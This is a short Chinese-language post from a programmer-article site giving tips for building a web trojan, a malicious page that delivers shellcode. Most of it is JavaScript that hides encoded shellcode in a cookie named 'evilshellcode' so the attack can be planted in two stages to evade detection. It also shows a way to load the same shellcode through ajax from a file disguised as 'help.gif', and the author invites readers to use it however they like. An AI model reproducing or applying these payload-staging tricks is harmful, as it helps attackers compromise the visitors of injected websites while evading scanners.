欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

一个网马的tips实现分析

程序员文章站 2023-12-09 23:59:45
cookie示例代码: 复制代码 代码如下: //存放 function setcookie(svar, sval){ thecookie = svar + '=' + s...
cookie示例代码:
复制代码 代码如下:

//存放
function setcookie(svar, sval){
thecookie = svar + '=' + sval + '; expires=fri, 1 jul 2020 09:45:27 utc';
document.cookie = thecookie;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setcookie('evilshellcode', shellcode);
//取出
function getcookie(svar){
cookies = document.cookie.split('; ');
for(var i = 1; i <= cookies.length; i++){
if(cookies[i - 1].split('=')[0] == svar){return cookies[i - 1].split('=')[1];}}
return '';
}
a=unescape(getcookie('evilshellcode'))


cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用
复制代码 代码如下:

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script>
var shellcode = $.ajax({
url: "help.gif",
async: false
}).responsetext

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec
相关标签: 网马 tips